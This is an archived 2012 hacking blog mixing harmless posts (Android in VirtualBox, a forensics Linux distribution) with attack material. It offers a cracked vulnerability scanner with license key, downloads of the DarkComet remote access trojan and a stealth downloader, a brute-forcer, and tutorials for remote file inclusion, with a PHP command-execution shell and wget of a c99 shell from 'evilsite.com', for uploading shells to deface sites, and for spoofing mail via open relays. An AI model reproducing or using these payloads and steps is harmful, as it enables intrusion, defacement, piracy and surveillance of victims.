ROLL

Friday, July 27, 2012

How To Install Android 4.0 VirtualBox




The mobile smartphone and tablet industry seems to have a very prominent divide, with a lot of consumers having their favorite operating system and choosing to stick to hardware which is powered by their chosen OS. Obviously fans of Apple’s iOS use the iPhone and iPad devices, whereas Android lovers have a wide range of hardware to choose from due to the fact that the OS is available to multiple manufacturers.But what happens if you are a die hard fan of iOS, or Windows Phone but you still want to sample the delights that Android Ice Cream Sandwich has to offer? I personally am an iPhone user for the last five years and will continue to be for the foreseeable future. But after recently getting my first taste of Android, I am severely tempted to shell out for a second device so I can have the benefits that both provide. For those that can’t, or won’t, purchase a second device then why not run Android 4.0 in virtualization on your desktop or laptop in order to see the Ice Cream Sandwich experience first hand? Android 4.0 is an operating system in its own right, but instead of running on a dual boot setup, we install and run ICS within a free of charge virtualization application known as VirtualBox. VirtualBox runs like any other application or program on your machine, but offers the benefits of being able to install a secondary OS within it which can be invoked quickly by the user. For all those die hard iOS and Windows Phone fans out there, this is a perfect way to experience the delights of Android.
Are you ready for a whirlwind journey down Ice Cream Sandwich lane? Buckle in and follow the simple steps below.

Step 1: Head over to the official Oracle VM VirtualBox site and download the relevant VirtualBox binary for your computers operating system (Windows/Mac OS X/Linux/Solaris).

Step 2: Find the saved location of the downloaded VirtualBox binary and install as you would with any other native application making sure to follow all on screen prompts and instructions.


Step 3: Head on over to the VMLite website and download a copy of the Ice Cream Sandwich which has been preconfigured for virtualization and features seamless mouse support for navigation. The download weighs in at 88MB in size so may take a while to download depending on your connection.



Step 4: Locate the downloaded ‘Android-v4.7z‘ file and extract the contents from within.


Step 5: Once the Android-v4.7z file has been opened, locate a file from within the archive called ‘Android-v4.vbox‘ which as you can tell by the file extension is a pre configured VirtualBox file.

Step 6: Double click on the Android-v4.vbox file which will load the VirtualBox application and boot up the ICS file.



Step 7: When the boot menu is presented in VirtualBox, press ‘start‘ on the top toolbar and then if required select the ‘Android Startup from /dev/sda‘ option.


Step 8: All steps are complete. Android 4.0 ICS should now be booting up allowing you to enjoy that Android goodness.

Windows and Linux users may find that an alternative, specific version Android 4.0 may be required, which can be found by visting the Android-x86 page. The performance of the Android ICS virtual installation will obviously not be as smooth as intended on an actual device built for purpose, but it does give a feel of the OS with apps being able to launch as well as widget customization.

ACUNETIX WEB VULNERABILITY SCANNER VERSION 8 + PATCH (CRACK) FULL

Worlds best and most popular Vulnerability scanner full version download


Features At a Glance :- 
* Manipulation of inputs from URLs:
Acunetix WVS can automatically identify URL parameters and manipulate them to detect vulnerabilities. This technology is not present in any other competing vulnerability scanner.
Replace manual intervention with scanner intelligence
* Automatic custom 404 error page identification:
Acunetix WVS 8 can automatically determine if a custom error page is in use, and recognizes it without needing any recognition patterns to be configured before the scan.
Interpret IIS 7 rewrite rules automatically
Using the web application’s web.config file, WVS 8 can automatically interpret rewrite rules without requiring any manual input.
Fix vulnerabilities while locking hackers out
* Imperva Web Application Firewall integration:
An exciting co-operation between Imperva and Acunetix; WVS 8 scan results can be imported into an Imperva Web Application Firewall and interpreted automatically as firewall rules.
Use WVS 8 as a true security scanning workhorse
* Multiple instance support:
Acunetix WVS 8 can be relaunched as multiple instances on the same machine, allowing the user to scan multiple websites enabling further support for multi-user scenarios on the same server/workstation.
Re-scan without re-configuring
* Scan settings templates:
WVS 8 can save the settings for the scan of a specific application as a template, making it quick and easy to recall those exact settings for the same application each time it is scanned. This is particularly useful when auditing multiple sites, enabling the user to load the template for each site instead of re-configuring everything manually.
Launch a scan quicker than before
* Simplified Scan Wizard:
In addition to the introduction of Scan Settings Templates and automatic custom 404 error page recognition, the Scan Wizard contains far less options so it’s much easier and quicker to kick off a scan.
Access your results from anywhere and everywhere
* Web-based scheduler:
Accessible via a web interface, the new Scheduler allows administrators to download scan results from any workstation, laptop, or smartphone. The new Scheduler will automatically launch another instance of WVS when multiple web scans are due, preventing multiple processes from depending on the resources of one WVS instance, and thereby allowing scans to complete in less time.
Identify threats unseen by other black-box scanners
* New HTTP Parameter Pollution vulnerability class:
At the time of writing, Acunetix WVS 8 is the only scanner that tests for this security vulnerability.
Ensure complex scans will complete automatically and successfully
* Smart memory management:
The following settings have been added to optimise scanning efficiency:
Define number of files per directory
Limit number of subdirectories per website
Assign Crawler memory limit
Other New Features:-
Real time Crawler status (number of crawled files, inputs discovered, etc.)
Support for custom HTTP headers in automated scans
Configurable log file retention
Detailed Crawler coverage report
Scan status included in report


Steps to get full version of Acunetix web scanner v8 for free
At First got to this link and download acunetix scanner
ID: acunetixwvsfullv8
Password: nFu834!29bg_S2q
Then install it and Open patch and click on patch


Now open Acunetix you will be asked for some details
Enter below details
License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
Name: Hmily/[LCG]
ComPany: Www.52PoJie.Cn
Email: Hmily@Acunetix.com
Telephone: 110


Download PATCH (CRACK)

Mirror

Mirror

Wednesday, July 25, 2012

DPScan Drupal Security Scanner


The First Security scanner for Drupal CMS has been released by Ali Elouafiq, on his Blog. His team develop a tool that will enumerate at least the modules used by Drupal so we can simulate a White Box audit on our private machines.


This small tool is public and accessible to you for use however you please. It may help other auditors or penetration testers do their job faster, Here is a little demonstration. After downloading the script (in python), you simply type:
> python DPScan.py [website url]


Download Drupal Security Scanner 

Tuesday, July 24, 2012

BFT- Browser forensic tool


This software is an advanced local browser history search engine, in less than few seconds it will extract the chosen keywords of most famous web browser, actually Internet Explorer, Google Chrome, Mozilla FireFox and Opera.
The program will attempt to find the keyword(s) in the history title and search, if the keyword is present or suspected to be, it will be display in the result list with his URL and Title.
The software also give you the possibility to edit the default keywords and of course add / modify your own keywords, to separate keywords subject you can create your own keywords categories and only scan for some keywords in the chosen category .
The program is fully asynchronous so it won't affect your work during the scan time nor it will block the customization of keywords and keylist and can be canceled at anytime.
Notice that this software will in any case alter the data, it will just open in read only and in background all history even if archived.
This software was coded by DarkCoderSc (Jean-Pierre LESUEUR) using Delphi XE (Object Pascal IDE) and is fully FREE. Feel free to contact me for giving a feedback and report bugs or suggestions. 

Monday, July 23, 2012

DarkComet RAT 5.3 Final


The final version of DarkComet RAT 5.3 is out, and don't worry guy's it still the beginning of this 4 years project (already), DarkCoderSc have a lot of ideas / works to implement to this project for his next versions/ generations also i'm still working in a lite version even if in this version you already can lift functions you don't wan't to use using a new functionality in client settings.
Also VertexNet is not dead, it should rebirth soon as i have more free time and some other big projects to finalize, VertexNet will be totally recoded and of course Linked to the DarkComet RAT.
[Change for 5.3.1 FIX 1]
- New action added in FTP Client, you can copy to clipboard the link of a file (useful for file downloader (URL))
- A very huge bug was fixed for stub startup, now it works fine 
- A bug fix when using user list thumbnails

Screenshot :













[Curent Changes 5.3]
- [FIX ] HTTP Flood more efficient
- [FIX ] In settings the last theme is correctly set in the combobox
- [FIX ] Auto SIN Refresh ratio successfully saved in config.ini
- [GUI ] Client Settings GUI changed, it is now more user friendly and fit with the rest of DarkComet RAT Design
- [GUI ] EULA At startup is more beautiful
- [GUI ] No IP Gui revised
- [GUI ] User group Gui revised
- [FUNC] Search for update added in settings
- [GUI ] Keylogger GUI revised
- [FIX ] Now desktop correctly save snapshots (if option enabled)
- [DEL ] Delete in full editor (read only, archived, tempory) attributes to avoid some stub problems if used
- [FIX ] Users list flags support now Serbia Country (Republic of Serbia)
- [FIX ] VIP Lounge price and URL fixed
- [FUNC] HOT, Now you can chose wich functions you need in the control center, and not be bloated with functions you might never used. (In settings window)
- [FIX ] FTP Upload Keylogger Logs bug fixed
- [FUNC] FTP Wallet added in settings, it allow you to setup and test your FTP accounts for compatible DarkComet RAT FTP Functions
- [FUNC] FTP Wallet is now linked to the Edit Server keylogger FTP Managment
- [FUNC] Now you can upload files from file manager to one of your FTP account (compatible with the FTP Wallet)
- [FUNC] Embedded FTP Client added to DarkComet, multithread using Pure API, very fast and reliable and of course user friendly.
- [FIX ] Bug fixed when module startup enable, no more tons of process on reboot etc.. support Drag n Drop
- [FUNC] Drag And Drop added in File Manager to upload files frop explorer directly to remote computer
- [FUNC] New downloader method implemented using Pure low level API's instead of the shit URLDownloadUrlToFile bloated of crap
- [FUNC] File Downloader manager from control center been improved and bug fixed, now file are correctly downloaded, also you can chose a PATH from combobox shortcut
- [FUNC] Mass downloader from user list been improved and multithreaded, also download bug is now fixed
- [FUNC] Same as for mass downloader, update from URL bug fixed and improved

DOWNLOAD DarkComet RAT 5.3 Final

Sunday, July 22, 2012

BRUTER (BINARY + SOURCE) WEB FORM/FTP/POP3/VNC/SMTP/MYSQL/IMAP/HTTP CRACKER



Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication.
Here Home Page: http://worawita.sourceforge.net/



Download

Acunetix Web Vulnerability Scanner 8 BETA




As the BETA program for Acunetix Web Vulnerability Scanner 8 keeps gaining momentum, all the great feedback received from our BETA participants has helped us achieve the BETA 2 milestone. This brings a significant number of improvements to WVS 8, including new usability features, component enhancements, and a series of bug-fixes.


WVS 8 BETA 2 Change Log
The following updates have been included in the BETA 2 build of WVS 8:


Featured Improvements
Additional .NET AcuSensor support for .NET versions 3, 3.5, 4
Improved blind SQL injection timing tests for PostgreSQL
Improved blind SQL injection timing tests for request-timeout situations
Logs are now flushed to the log-file every 10 seconds when running in console mode
Scheduler feature: notification bar appears if the connection with the server is lost
Bug Fixes
Crash (runtime passive analysis) when “Disable Crawler Aerts” option is enabled
Problem with logging of HTTP_Anomalies when running multiple instances
Problem with writing to temp folder when running multiple instances
Issue with saving application logs to an invalid folder when running the Scheduler
Crash when multiple instances of WVS try to detect custom 404 error-page patterns
Scan does not resume correctly when the Scheduler automatically resumes a scan
Issue with retest functionality for web application scripts
Proxy crash, commonly when the process is already executing
Settings in use by another instance cannot be saved as a Scan Settings Template
Reporter crash when the text in the alert details is too long
Periodical vulnerability reports show incorrect publishing date
Database ID allocation is now synchronized between multiple WVS instances
Scan results cannot be download from the Scheduler since Internet Explorer 7 cache is not used
HTML report format is missing from the Scheduler web interface
Installer assigns full permissions to the license file (non-admin users receive an error when scanning)
Fixed the Scheduler’s Add Scan dialog on Internet Explorer 9
Errors related to a browser-tab do not appear if a different tab is being viewed
Malfunction with some Advanced Penetration testing tools when used through a proxy server
XSS tests are no longer case-sensitive
Scheduler returns invalid error message when connecting to password-protected applications
Scheduler not scanning password-protected applications
Crash with AcuSensor for .NET
False positives are saved for each user instead of globally
Changes to application settings not synchronized across multiple instances
Typos in UI
Reporter RTF-export malfunction
Reporter sets incorrect filename for exported and saved reports
Text wrap working inconsistently across reports

The Acunetix WVS Version 8 user manual is available in PDF Format and also in HTML Format.



Download Acunetix WVS Version 8 BETA

CAINE 2.5.1 (SuperNova) A GNU/Linux Live Distribution



CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a project of Digital Forensics 
Currently the project manager is Nanni Bassetti
CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface.
The main design objectives that CAINE aims to guarantee are the following:
an interoperable environment that supports the digital investigator during the four phases of the digital investigation
a user friendly graphical interface
a semi-automated compilation of the final report
We recommend you to read the page on the CAINE policies carefully.
CAINE represents fully the spirit of the Open Source philosophy, because the project is completely open, everyone could take the legacy of the previous developer or project manager. The distro is open source, the Windows side (Wintaylor) is open source and, the last but not the least, the distro is installable, so giving the opportunity to rebuild it in a new brand version, so giving a long life to this project ....

CHANGELOG CAINE 2.5.1 "SuperNova"
Kernel 2.6-32.35 
ADDED:
ZFS Fuse 
exFat support 
Epiphany browser 
new mounter 
new TSK (Sleuthkit)
some fixings
New NAUTILUS SCripts 
ataraw 
bloom 
fiwalk 
xnview 
NOMODESET in starting menu 
xmount 
sshfs 
Reporting by Caine Interface fixed 
xmount-gui 
nbtempo 
fileinfo 
TSK_Gui 
Raid utils e bridge utils 
SMBFS
BBT.py
------------
Widows Side:
Wintaylor updated & upgraded


RBFstab and Mounter
1) "rbfstab" is a utility that is activated during boot or when a device is plugged.  It writes read-only entries to /etc/fstab so devices are safely mounted for forensic imaging/examination.  It is self installing with 'rbfstab -i' and can be disabled with 'rbfstab -r'.  It contains many improvements over past rebuildfstab incarnations.  Rebuildfstab is a traditional means for read-only mounting in forensics-orient distributions.
2) "mounter" is a GUI mounting tool that sits in the system tray.  Left clicking the system tray drive icon activates a window where the user can select devices to mount or un-mount.  With rbfstab activated, all devices, except those with volume label "RBFSTAB", are mounted read-only.  Mounting of block devices in Nautilus (file browser) is not possible for a normal user with rbfstab activated making mounter a consistent interface for users.
by John Lehr 
Live Preview Nautilus Scripts

CAINE includes scripts activated within the Nautilus web browser designed to make examination of allocated files simple. Currently, the scripts can render many databases, internet histories, Windows registries, deleted files, and extract EXIF data to text files for easy examination. The Quick View tool automates this process by determining the file type and rendering with the appropriate tool. 
The live preview Nautilus scripts also provide easy access to administrative functions, such as making an attached device writeable, dropping to the shell, or opening a Nautilus window with administrator privileges. The "Save as Evidence" script will write the selected file(s) to an "Evidence" folder on the desktop and create a text report about the file containing file metadata and an investigator comment, if desired. 
A unique script, "Identify iPod Owner", is included in the toolset. This script will detect an attached and mounted iPod Device, display metadata about the device (current username, device serial number, etc.). The investigator has the option to search allocated media files and unallocated space for iTunes user information present in media purchased through the Apple iTunes store, i.e., Real Name and email address. 
The live preview scripts are a work in progress. Many more scripts are possible as are improvements to the existing scripts. The CAINE developers welcome feature requests, bug reports, and critiques. 
The preview scripts were born of a desire to make evidence extraction simple for any investigator with basic computer skills. They allow the investigator to get basic evidence to support the investigation without the need of advanced computer forensics training or waiting upon a computer forensics lab. Computer forensics labs can used the scripts for device triage and the remainder of the CAINE toolset for a full forensic examination! 
John Lehr
-------------
CASPER PATCH
The patch changes the way how Casper searches for the boot media. By default, Casper will look at hard disk drives, CD/DVD-drives and some other devices while booting the system (during the stage when system tries to find the boot media with correct root file system image on it - because common bootloaders do not pass any data about media used for booting to an operating system in Live CD configurations). Our patch is implemented for CD/DVD versions of CAINE and enables CD/DVD-only checks in Casper. This solves the bug when Casper would select and boot fake root file system images on evidentiary media (hard disk drives, etc). ------------
Suhanov Maxim


DOWNLOAD CAINE 2.5.1 - SUPERNOVA

Comet Beam v1.0 BETA



Description:
This little software will download a single or multiple files at the same time totally stealthly.


The stub is only (~24KiB) and packed (~14KiB).


WARNING: Like for DarkComet RAT this software is concidered as a Malware by your antivirus because it can be used to commit bad actions, in any case it contains viruses or related spywares.


Download Comet Beam v1.0 BETA

Remote File Inclusion (RFI) – Tutorial

What is RFI ?
RFI stands for Remote File Inclusion, examples of RFI is the bloated “C99″ script.As good as this script is, its not practical its too big and fills the access logs like a jew. Its highly noticeable.
What is the point in it?
Contrary to popular belief, not all website is hacking is SQL  RFI is great because you can get access too and edit all files on the server it makes defacements and stealing classified material as easy as … wget?
What do I need to be able to do this?
Well basically, a web browser, a simple PHP RFI Script (Will teach you a simple one) and some basic knowledge of BASH (Most servers are linux/unix so you might need this .
Lets go
Okay! So, to start with we need a vulnerable site… How do you find these? Well a g00gle d0rk can help you … Alot. RFI’s work by tricking the server into downloading and executing code thats not actually on it, say a website was
http://shittysite.com/index.php?page=about
This could be a site that pulls in .txt documents to display as pages, very very insecure yet people still do it. Anyway, this either uses the PHP include function we can exploit this… How?
http://shittysite.com/index.php?page=http://evilsite.com/ourscript.txt
Now this could work, it could work quite well. If the site is vulnerable something would happen but I will get into what in a minute.
So, you might of noticed that I added the .txt extension, this might not work as the ?page=about had no .txt extension. This could be because the script automatically appends the .txt file extension (the error you will get is something about it not being able to include ourscript.txt.txt), now as it is appending .txt we can just put ourscript and it will still work, however if it auto-appends something along the lines of .php then we have to use a null byte which is .
Okay, so what do we actually put into ourscript.txt before we do this? Well it could be something like the C99, but unless that script is uploaded instead of included you will get a ton of errors and none of the features will work so instead we have to build our own little script to get this baby working.
Code :
<?php

echo "<script>alert(1337);</script>";
echo "Executing command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);

?>
Something like that will work, as we can send a command to the linux/unix server in bash as well as testing if its RFI vulnerable with the alert box.
Ok, so if it worked we are in luck as we can now send a few commands to the server.
To start with lets try and list all the documents in the current directory. Anyone who knows any bash will know that the list command is ls not dir.
So we do:
http//shittysite.com/index.php?cmd=ls&page=http://evilsite.com/ourscript
That then sends the cmd that we put into our script, and starts to list the documents… This is great! Now we can do anything now, anything at all we can deface the current page using something as simple as
cmd=echo This site got pwn3d by hacker > index.php
That will re-write the index.php and pwn it (Or in the case of a website with .txt extensions you will want to put this into one of the .txt files)
We can download, remove, rename, anything! But that means you need to know some bash. In case you don’t, not all is lost! You can use the ‘wget’ function to download a c99 script.
Ok so how do we do that?
cmd=wget http://evilsite.com/c99.txt
now as a .txt the script is going to be useless, well we could use some LFI but we aren’t going to we are just going to rename it!
mv
Simples..
cmd=mv c99.txt hacked.php
Now by just going to hacked.php the C99 will work and the site can be pwned that way.
This is just a simple tutorial, not too advanced. Its meant to give an overview of RFI, not a complete guide

How To Upload Shell And Deface – Tutorial

What we need:
1-A Shell (Will be provided)
2-A website vulnerable to SQLi
3-Image or File upload area on that Vulnerable website
So firstly download the shell here.
What is Shell ?
A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )
I am not going to explain SQLi just how to deface.
So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.
Now login to the admin page with the admin details you got.
Go through the admin page until you find a place where you can upload a picture (Usually a picture).
Now you have to upload the shell. Right if you don’t get an error it is all good.
Now to find the shell
Go through the site until you find any image and if you are using firefox Right
- Click on it and “Copy Image Location”
Make a new tab and paste it there.
It will probably look something like this:
http://www.example.com/images/photonamehere.jpg
So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)
Now a page will come up looking like this:
igz03k How To Upload Shell and Deface   Tutorial
Does probably not look like that but will look similar.
Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.
Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.
Keep in mind:
• Change Admin Username and Password
•The people have FTP access so you need to change that Password too .
•Always use a Proxy or VPN

Tuesday, July 10, 2012

Hacking SMTP Mail Gateways

Mail Servers: They have their own language
There are many types and brands of e-mail servers used on the Internet. There's Sendmail, been around for a long time and typically used on UNIX systems, Microsoft Exchange, a Microsoft product of course, and GroupWise, a Novell product, just to name a few.
Regardless of the services and options each flavor of mail server offers you, they all have one thing in common. They must abide by the rules of the SMTP communications standards, and in effect, speak a common language. If you want to know more about this, read the SMTP "Request For Comment" , or RFC located here.
e-mail relaying

SMTP Mail Relaying and Social Engineering

Mail Relaying: What's the big deal?
Although not a traditional vulnerability, one of the most common forms of SMTP misuse is email relaying, or email spoofing. This method is routinely used by spammers to distribute their unwanted, and unsolicited information. In many cases, they setup their own mail servers, configured to allow mail relaying. However, if your smtp gateway is not setup to prevent mail relay, the spammers will kindly use it. This is a very simple procedure and in most cases is completely automated.

Social Engineering Attack by E-mail
Another common use of email relay and spoofing is social engineering attacks. We recently performed a security assessment for an organizing where we were permitted to perform social engineering and denial-of-service attacks. It turned out that this company's SMTP server was not configured to prevent email relaying. We attached to the SMTP gateway from the Internet, spoofed the e-mail address of one of the IT people, and sent an e-mail to ten end-users instructing them to "Shutdown their computers immediately because the IT team had detected a serious virus / or worm on their computer". All ten of the users did exactly as we asked. Imagine if we sent this e-mail to the "everyone" e-mail distribution group. Probably would not have been a good day for the IT folks.
I want to make the point that I am writing this article for the purpose of education and awareness. The purpose is NOT to provide someone the information needed to abuse SMTP services.

Speaking the SMTP Language

The Basics of Hacking SMTP Gateways and Communications

There are a handful of methods in direct SMTP communication but for the sake of this article we will only review a few items.  These items, if the SMTP gateway you are attached to allows mail relaying, is all that is needed to successfully email spoof or e-mail relay.
  • Our Target: "smtpmailserver.ontheinternet.com";
  • Our Tool: The good ole "telnet: client;
  • Our Objective: Determine if mail relay is possible and execute it.
The following are the six commands (or steps) we will use to check for and execute a mail relay:
  1. "telnet": A communications client used to connect to the SMTP port 25 on the target mail server;
  2. "helo": SMTP command used to introduce ourselves to the SMTP server
  3. "mail from:": SMTP command to identify who mail will be sent from
  4. "rcpt to:": SMTP command telling the mail server who to send the e-mail too;
  5. "data": SMTP command that instructs the mail server that the text typed after this command is the body of our message;
  6. "(enter).(enter)": When we are finished writing our message we will hit the (enter) button, the period".", then another (enter) and the mail will be queued for delivery

Action: "telnet smtpmailserver.ontheinternet.com 25": Connect to our SMTP gateway, on port 25, using the telnet client" Response: "220 smtpmailserver.ontheinternet.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Mon, 11 Apr 2005 11:15:50 -0400"
Result: You successfully connected to the Server!
Action: "helo": say hello to the gateway Response: "250 smtpmailserver.ontheinternet.com [10.1.1.x]"
Result: The gateway greets you!
Action: "rcpt to: person@targetdomain.com": Who are we sending the e-mail to? Response: "250 2.1.5 person@targetdomain.com"
Result: We are close to sending our spoofed e-mail message!!!Action: "data (then hit enter)": Tell the smtp server we are writing our message next!
Response: "354 Start mail input; end with <CRLF>.<CRLF>": The mail server is telling us to write our message then type "enter" a period ".", then "enter" again
Result: You type your message
Action: "(Hit enter) type "." (Hit enter)": Tell the smtp server we are finished writing our message!
Response: "250 2.6.0 <smtpmailserver WQm21OesnsI0000148e@smtpmailserver.ontheinternet.com> Queued mail for delivery"
Result: The SMTP mail server has just accepted your e-mail for delivery and has queued it for sending!

Conclusion

Automating The Process
As you can see, this process is pretty strait forward. Automating the process is quite simple and can be done by writing a script in any number of languages. A script designed to send out mass mail can do so very quickly and efficiently. If you or your companies mail server were to be a target of email relay, it could cause you a lot of trouble. It may even overwhelm your mail server to the point of causing a denial-of-service attack. Effectively preventing you from sending legitimate mail.

Securing Your Mail Server
Preventing mail relay is usually pretty easy to do. On some mail servers it's as easy as checking off a button. Others require a little more effort. For information regarding securing the few e-mail servers I mentioned above you can review the following links:

Microsoft Exchange: Securing Exchange Communications
Novell GroupWise: Secure Message Concepts
Sendmail: Linux: Securing Sendmail

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.
Related Posts Plugin for WordPress, Blogger...

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More